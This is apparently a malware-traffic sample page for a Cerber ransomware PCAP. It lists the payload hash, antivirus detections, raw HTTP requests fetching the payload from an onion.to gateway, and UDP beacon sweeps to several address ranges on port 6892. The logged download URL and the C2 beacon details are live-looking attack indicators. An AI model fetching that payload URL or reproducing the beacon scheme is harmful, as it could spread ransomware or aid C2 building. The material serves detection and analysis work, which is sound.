
Cerber Zerber Ransomware Trojan Malware oamnohndpiwpicgm.onion.to 194.165.16.* UDP C2 PCAP File Download Traffic Sample

Download Attachments

  • 1 pcap dat_onion
    Date added: January 16, 2017 7:32 am   Added by: admin   File size: 106 KB
Downloaded payload (the .dat fetched in the first HTTP request below):

SHA256: 7dd82320953cc4257259ec4bba37ee6485493d49ac35428918ea4a0d36988cd9
File name: 63b873380be779512d2ff1acdc2cc063.dat
Detection ratio: 40 / 55
Analysis date: 2017-01-16 07:28:17 UTC

Only 13 of the 40 detecting engines are reproduced here:

Engine                   Detection                       Signature date
AegisLab                 Troj.Ransom.W32.Zerber!c        20170116
AhnLab-V3                Trojan/Win32.Cerber.R191828     20170116
Arcabit                  Trojan.Generic.D3B3C08          20170116
Avast                    Win32:Trojan-gen                20170116
Avira (no cloud)         TR/Crypt.Xpack.ptihk            20170116
BitDefender              Trojan.GenericKD.3881992        20170116
Bkav                     HW32.Packed.D860                20170114
CAT-QuickHeal            Ransom.Cerber.B                 20170116
CrowdStrike Falcon (ML)  malicious_confidence_82% (W)    20161024
Cyren                    W32/Trojan.TLPW-4766            20170116
DrWeb                    Trojan.Encoder.7233             20170116
ESET-NOD32               NSIS/Injector.MM                20170116
Emsisoft                 Trojan-Ransom.Cerber (A)        20170116

Payload download. The .dat is fetched over plain HTTP from oamnohndpiwpicgm.onion.to, a Tor2web-style clearnet gateway in front of a hidden service, which resolved to 192.36.27.5 in this capture. The User-Agent is an old IE8/XP string, not the browser of the analysis host:

2017-01-15 23:24:56.595989 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 0:331, ack 1, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

Traffic to Microsoft hosts. The fwlink request with Ext=dat and the shell.windows.com lookup are consistent with Windows handling a file of unregistered extension (.dat) in the analysis VM; they are not part of the malware's channel:

2017-01-15 23:25:05.181614 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [P.], seq 0:240, ack 1, win 256, length 240: HTTP: GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
GET /fwlink/?LinkId=57426&Ext=dat HTTP/1.1
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: go.microsoft.com
Connection: Keep-Alive

2017-01-15 23:25:05.264474 IP 192.168.1.102.56837 > 75.75.75.75.53: 15743+ A? shell.windows.com. (35)
2017-01-15 23:25:05.280898 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [.], ack 344, win 255, length 0
2017-01-15 23:25:05.523123 IP 192.168.1.102.62746 > 23.64.74.2.80: Flags [.], ack 345, win 255, length 0
The same GET is repeated 14 seconds later on the same connection (seq 331:662, after 144 bytes of response to the first request):

2017-01-15 23:25:10.559228 IP 192.168.1.102.62740 > 192.36.27.5.80: Flags [P.], seq 331:662, ack 145, win 256, length 331: HTTP: GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
GET /upload/63b873380be779512d2ff1acdc2cc063.dat HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Accept-Encoding: gzip, deflate
Host: oamnohndpiwpicgm.onion.to
Connection: Keep-Alive

An existing TCP/443 session to 23.96.38.64 (mid-stream; the client sends 469 and 85 bytes, receives about 12 KB, then closes). The application data is encrypted, so only the packet summaries are kept:

2017-01-15 23:26:41.145409 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [P.], seq 416:885, ack 4922, win 258, length 469
2017-01-15 23:26:41.182203 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 7842, win 258, length 0
2017-01-15 23:26:41.183483 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 10762, win 258, length 0
2017-01-15 23:26:41.184075 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 12335, win 258, length 0
2017-01-15 23:26:41.184772 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [P.], seq 885:970, ack 12335, win 258, length 85
2017-01-15 23:26:41.184840 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [F.], seq 970, ack 12335, win 258, length 0
2017-01-15 23:26:41.205735 IP 192.168.1.102.62749 > 23.96.38.64.443: Flags [.], ack 12336, win 258, length 0
UDP beacons on port 6892. From a single source port (57428) the infected host sends one identical 10-byte datagram, ASCII payload "hi005c9027", to consecutive addresses of 15.49.2.0/24 (excerpt: .0 through .10, within about one millisecond):

2017-01-15 23:26:49.285306 IP 192.168.1.102.57428 > 15.49.2.0.6892: UDP, length 10
2017-01-15 23:26:49.285682 IP 192.168.1.102.57428 > 15.49.2.1.6892: UDP, length 10
2017-01-15 23:26:49.285739 IP 192.168.1.102.57428 > 15.49.2.2.6892: UDP, length 10
2017-01-15 23:26:49.285790 IP 192.168.1.102.57428 > 15.49.2.3.6892: UDP, length 10
2017-01-15 23:26:49.285840 IP 192.168.1.102.57428 > 15.49.2.4.6892: UDP, length 10
2017-01-15 23:26:49.285890 IP 192.168.1.102.57428 > 15.49.2.5.6892: UDP, length 10
2017-01-15 23:26:49.285940 IP 192.168.1.102.57428 > 15.49.2.6.6892: UDP, length 10
2017-01-15 23:26:49.285942 IP 192.168.1.102.57428 > 15.49.2.7.6892: UDP, length 10
2017-01-15 23:26:49.286028 IP 192.168.1.102.57428 > 15.49.2.8.6892: UDP, length 10
2017-01-15 23:26:49.286078 IP 192.168.1.102.57428 > 15.49.2.9.6892: UDP, length 10
2017-01-15 23:26:49.286080 IP 192.168.1.102.57428 > 15.49.2.10.6892: UDP, length 10

The same 10-byte datagram ("hi005c9027") swept across 122.1.13.0/24 (excerpt: .0 through .11):

2017-01-15 23:26:49.287148 IP 192.168.1.102.57428 > 122.1.13.0.6892: UDP, length 10
2017-01-15 23:26:49.287150 IP 192.168.1.102.57428 > 122.1.13.1.6892: UDP, length 10
2017-01-15 23:26:49.287198 IP 192.168.1.102.57428 > 122.1.13.2.6892: UDP, length 10
2017-01-15 23:26:49.287286 IP 192.168.1.102.57428 > 122.1.13.3.6892: UDP, length 10
2017-01-15 23:26:49.287336 IP 192.168.1.102.57428 > 122.1.13.4.6892: UDP, length 10
2017-01-15 23:26:49.287386 IP 192.168.1.102.57428 > 122.1.13.5.6892: UDP, length 10
2017-01-15 23:26:49.287388 IP 192.168.1.102.57428 > 122.1.13.6.6892: UDP, length 10
2017-01-15 23:26:49.287472 IP 192.168.1.102.57428 > 122.1.13.7.6892: UDP, length 10
2017-01-15 23:26:49.287522 IP 192.168.1.102.57428 > 122.1.13.8.6892: UDP, length 10
2017-01-15 23:26:49.287572 IP 192.168.1.102.57428 > 122.1.13.9.6892: UDP, length 10
2017-01-15 23:26:49.287574 IP 192.168.1.102.57428 > 122.1.13.10.6892: UDP, length 10
2017-01-15 23:26:49.287657 IP 192.168.1.102.57428 > 122.1.13.11.6892: UDP, length 10

The same 10-byte datagram ("hi005c9027") swept across 194.165.16.0/24, the range named in the title (excerpt: .1 through .10):

2017-01-15 23:26:49.288685 IP 192.168.1.102.57428 > 194.165.16.1.6892: UDP, length 10
2017-01-15 23:26:49.288734 IP 192.168.1.102.57428 > 194.165.16.2.6892: UDP, length 10
2017-01-15 23:26:49.288737 IP 192.168.1.102.57428 > 194.165.16.3.6892: UDP, length 10
2017-01-15 23:26:49.288786 IP 192.168.1.102.57428 > 194.165.16.4.6892: UDP, length 10
2017-01-15 23:26:49.288866 IP 192.168.1.102.57428 > 194.165.16.5.6892: UDP, length 10
2017-01-15 23:26:49.288916 IP 192.168.1.102.57428 > 194.165.16.6.6892: UDP, length 10
2017-01-15 23:26:49.288919 IP 192.168.1.102.57428 > 194.165.16.7.6892: UDP, length 10
2017-01-15 23:26:49.288966 IP 192.168.1.102.57428 > 194.165.16.8.6892: UDP, length 10
2017-01-15 23:26:49.289051 IP 192.168.1.102.57428 > 194.165.16.9.6892: UDP, length 10
2017-01-15 23:26:49.289100 IP 192.168.1.102.57428 > 194.165.16.10.6892: UDP, length 10

Three seconds later a second sweep, from a new source port (57429), carries a 24-byte datagram, ASCII payload "8870f233185a005c950110f5", to 194.165.17.0/24 (excerpt: .244 through .255, the last one a second after the rest):

2017-01-15 23:26:52.735146 IP 192.168.1.102.57429 > 194.165.17.244.6892: UDP, length 24
2017-01-15 23:26:52.735196 IP 192.168.1.102.57429 > 194.165.17.245.6892: UDP, length 24
2017-01-15 23:26:52.735198 IP 192.168.1.102.57429 > 194.165.17.246.6892: UDP, length 24
2017-01-15 23:26:52.735279 IP 192.168.1.102.57429 > 194.165.17.247.6892: UDP, length 24
2017-01-15 23:26:52.735329 IP 192.168.1.102.57429 > 194.165.17.248.6892: UDP, length 24
2017-01-15 23:26:52.735379 IP 192.168.1.102.57429 > 194.165.17.249.6892: UDP, length 24
2017-01-15 23:26:52.735381 IP 192.168.1.102.57429 > 194.165.17.250.6892: UDP, length 24
2017-01-15 23:26:52.746310 IP 192.168.1.102.57429 > 194.165.17.251.6892: UDP, length 24
2017-01-15 23:26:52.746315 IP 192.168.1.102.57429 > 194.165.17.252.6892: UDP, length 24
2017-01-15 23:26:52.746317 IP 192.168.1.102.57429 > 194.165.17.253.6892: UDP, length 24
2017-01-15 23:26:52.746320 IP 192.168.1.102.57429 > 194.165.17.254.6892: UDP, length 24
2017-01-15 23:26:53.725719 IP 192.168.1.102.57429 > 194.165.17.255.6892: UDP, length 24
